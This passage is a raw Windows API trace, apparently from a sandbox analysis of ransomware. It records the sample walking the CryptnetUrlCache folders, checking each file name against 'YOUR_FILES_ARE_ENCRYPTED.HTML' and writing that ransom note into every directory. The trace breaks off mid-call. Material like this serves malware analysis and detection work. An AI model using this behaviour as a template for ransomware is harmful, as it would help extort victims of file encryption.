[0164.787] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 108 [0164.787] lstrcmpW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.787] PathFindExtensionW (pszPath="94308059B57B3142E455B38A6EB92015") returned="" [0164.787] lstrlenW (lpString="") returned 0 [0164.787] PathFindExtensionW (pszPath="94308059B57B3142E455B38A6EB92015") returned="" [0164.787] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1e505f90, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x1e505f90, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x1e505f90, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x0, dwReserved1=0x60, cFileName="C0018BB1B5834735BFA60CD063B31956", cAlternateFileName="C0018B~1")) returned 1 [0164.787] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C0018BB1B5834735BFA60CD063B31956") returned 108 [0164.787] lstrcmpW (lpString1="C0018BB1B5834735BFA60CD063B31956", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.787] PathFindExtensionW (pszPath="C0018BB1B5834735BFA60CD063B31956") returned="" [0164.787] lstrlenW (lpString="") returned 0 [0164.787] PathFindExtensionW (pszPath="C0018BB1B5834735BFA60CD063B31956") returned="" [0164.787] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, 
ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x5f1, dwReserved0=0x0, dwReserved1=0x60, cFileName="E34E75954A05FA2156EB895949C74728", cAlternateFileName="E34E75~1")) returned 1 [0164.787] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\E34E75954A05FA2156EB895949C74728") returned 108 [0164.787] lstrcmpW (lpString1="E34E75954A05FA2156EB895949C74728", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.787] PathFindExtensionW (pszPath="E34E75954A05FA2156EB895949C74728") returned="" [0164.787] lstrlenW (lpString="") returned 0 [0164.787] PathFindExtensionW (pszPath="E34E75954A05FA2156EB895949C74728") returned="" [0164.787] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x67421e70, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x67421e70, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x67421e70, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x5f1, dwReserved0=0x0, dwReserved1=0x60, cFileName="F0ACCF77CDCBFF39F6191887F6D2D357", cAlternateFileName="F0ACCF~1")) returned 1 [0164.787] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F0ACCF77CDCBFF39F6191887F6D2D357") returned 108 [0164.787] lstrcmpW (lpString1="F0ACCF77CDCBFF39F6191887F6D2D357", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.788] PathFindExtensionW (pszPath="F0ACCF77CDCBFF39F6191887F6D2D357") returned="" [0164.788] lstrlenW (lpString="") returned 0 [0164.788] PathFindExtensionW (pszPath="F0ACCF77CDCBFF39F6191887F6D2D357") returned="" [0164.788] FindNextFileW (in: hFindFile=0x42f3240, 
lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x73e04850, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x73e04850, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x73e04850, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0x0, dwReserved1=0x60, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0164.788] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 108 [0164.788] lstrcmpW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.788] PathFindExtensionW (pszPath="F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0164.788] lstrlenW (lpString="") returned 0 [0164.788] PathFindExtensionW (pszPath="F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0164.788] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x73e04850, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x73e04850, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x73e04850, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0x0, dwReserved1=0x60, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0164.788] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0164.788] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0164.788] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0164.789] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0164.791] CloseHandle (hObject=0x5b8) returned 1 [0164.792] GetProcessHeap () returned 0x270000 [0164.793] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0164.793] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MetaData", cAlternateFileName="")) returned 1 [0164.793] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned 76 [0164.793] GetProcessHeap () returned 0x270000 [0164.793] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0164.793] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" [0164.793] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*" [0164.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0164.793] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.793] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1b2bced0, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x1b2bced0, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x1b2bced0, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x108, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="37C951188967C8EB88D99893D9D191FE", cAlternateFileName="37C951~1")) returned 1 [0164.793] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\37C951188967C8EB88D99893D9D191FE") returned 109 [0164.793] lstrcmpW (lpString1="37C951188967C8EB88D99893D9D191FE", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.794] PathFindExtensionW (pszPath="37C951188967C8EB88D99893D9D191FE") returned="" [0164.794] lstrlenW (lpString="") returned 0 [0164.794] PathFindExtensionW (pszPath="37C951188967C8EB88D99893D9D191FE") returned="" [0164.794] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x195ba2b0, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x195ba2b0, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x43698eb0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x154, dwReserved0=0x0, dwReserved1=0x60, cFileName="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", cAlternateFileName="57C8ED~1")) returned 1 [0164.794] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned 109 [0164.794] lstrcmpW (lpString1="57C8EDB95DF3F0AD4EE2DC2B8CFD4157", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.794] PathFindExtensionW (pszPath="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0164.794] lstrlenW (lpString="") returned 0 [0164.794] PathFindExtensionW (pszPath="57C8EDB95DF3F0AD4EE2DC2B8CFD4157") returned="" [0164.794] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x70be18f0, 
ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x70be18f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x70be18f0, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0x0, dwReserved1=0x60, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0164.794] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned 109 [0164.794] lstrcmpW (lpString1="696F3DE637E6DE85B458996D49D759AD", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.794] PathFindExtensionW (pszPath="696F3DE637E6DE85B458996D49D759AD") returned="" [0164.794] lstrlenW (lpString="") returned 0 [0164.794] PathFindExtensionW (pszPath="696F3DE637E6DE85B458996D49D759AD") returned="" [0164.794] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x25285390, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x100, dwReserved0=0x0, dwReserved1=0x60, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0164.794] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned 109 [0164.794] lstrcmpW (lpString1="7396C420A8E1BC1DA97F1AF0D10BAD21", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.794] PathFindExtensionW (pszPath="7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0164.794] lstrlenW (lpString="") returned 0 [0164.794] 
PathFindExtensionW (pszPath="7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0164.794] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x17fb5730, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x17fb5730, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x1e52c0f0, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x148, dwReserved0=0x0, dwReserved1=0x60, cFileName="77EC63BDA74BD0D0E0426DC8F8008506", cAlternateFileName="77EC63~1")) returned 1 [0164.794] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506") returned 109 [0164.794] lstrcmpW (lpString1="77EC63BDA74BD0D0E0426DC8F8008506", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.795] PathFindExtensionW (pszPath="77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0164.795] lstrlenW (lpString="") returned 0 [0164.795] PathFindExtensionW (pszPath="77EC63BDA74BD0D0E0426DC8F8008506") returned="" [0164.795] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x60decdd0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x60decdd0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x73e50b10, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0x0, dwReserved1=0x60, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0164.795] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 109 [0164.795] lstrcmpW 
(lpString1="94308059B57B3142E455B38A6EB92015", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.795] PathFindExtensionW (pszPath="94308059B57B3142E455B38A6EB92015") returned="" [0164.795] lstrlenW (lpString="") returned 0 [0164.795] PathFindExtensionW (pszPath="94308059B57B3142E455B38A6EB92015") returned="" [0164.795] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x1e505f90, ftCreationTime.dwHighDateTime=0x1d706a4, ftLastAccessTime.dwLowDateTime=0x1e505f90, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x1e52c0f0, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0x0, dwReserved1=0x60, cFileName="C0018BB1B5834735BFA60CD063B31956", cAlternateFileName="C0018B~1")) returned 1 [0164.795] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C0018BB1B5834735BFA60CD063B31956") returned 109 [0164.795] lstrcmpW (lpString1="C0018BB1B5834735BFA60CD063B31956", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.795] PathFindExtensionW (pszPath="C0018BB1B5834735BFA60CD063B31956") returned="" [0164.795] lstrlenW (lpString="") returned 0 [0164.795] PathFindExtensionW (pszPath="C0018BB1B5834735BFA60CD063B31956") returned="" [0164.796] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x5db57a50, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x5db57a50, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0xfa, dwReserved0=0x0, dwReserved1=0x60, cFileName="E34E75954A05FA2156EB895949C74728", cAlternateFileName="E34E75~1")) returned 1 [0164.796] 
wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\E34E75954A05FA2156EB895949C74728") returned 109 [0164.796] lstrcmpW (lpString1="E34E75954A05FA2156EB895949C74728", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.796] PathFindExtensionW (pszPath="E34E75954A05FA2156EB895949C74728") returned="" [0164.796] lstrlenW (lpString="") returned 0 [0164.796] PathFindExtensionW (pszPath="E34E75954A05FA2156EB895949C74728") returned="" [0164.796] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x67421e70, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x67421e70, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x67421e70, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0xf2, dwReserved0=0x0, dwReserved1=0x60, cFileName="F0ACCF77CDCBFF39F6191887F6D2D357", cAlternateFileName="F0ACCF~1")) returned 1 [0164.796] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F0ACCF77CDCBFF39F6191887F6D2D357") returned 109 [0164.796] lstrcmpW (lpString1="F0ACCF77CDCBFF39F6191887F6D2D357", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.796] PathFindExtensionW (pszPath="F0ACCF77CDCBFF39F6191887F6D2D357") returned="" [0164.796] lstrlenW (lpString="") returned 0 [0164.796] PathFindExtensionW (pszPath="F0ACCF77CDCBFF39F6191887F6D2D357") returned="" [0164.796] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x73e04850, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x73e04850, ftLastAccessTime.dwHighDateTime=0x1d706a2, 
ftLastWriteTime.dwLowDateTime=0x73e04850, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0x0, dwReserved1=0x60, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0164.796] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 109 [0164.796] lstrcmpW (lpString1="F90F18257CBB4D84216AC1E1F3BB2C76", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.796] PathFindExtensionW (pszPath="F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0164.796] lstrlenW (lpString="") returned 0 [0164.796] PathFindExtensionW (pszPath="F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0164.796] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x73e04850, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x73e04850, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x73e04850, ftLastWriteTime.dwHighDateTime=0x1d706a2, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0x0, dwReserved1=0x60, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0164.796] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0164.797] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0164.797] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0164.797] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0164.800] CloseHandle (hObject=0x5b8) returned 1 [0164.800] GetProcessHeap () returned 0x270000 [0164.801] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0164.801] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5db57a50, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x25285390, ftLastAccessTime.dwHighDateTime=0x1d706a4, ftLastWriteTime.dwLowDateTime=0x25285390, ftLastWriteTime.dwHighDateTime=0x1d706a4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MetaData", cAlternateFileName="")) returned 0 [0164.801] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0164.801] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0164.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\locallow\\microsoft\\cryptneturlcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5e4 [0164.802] WriteFile (in: hFile=0x5e4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, 
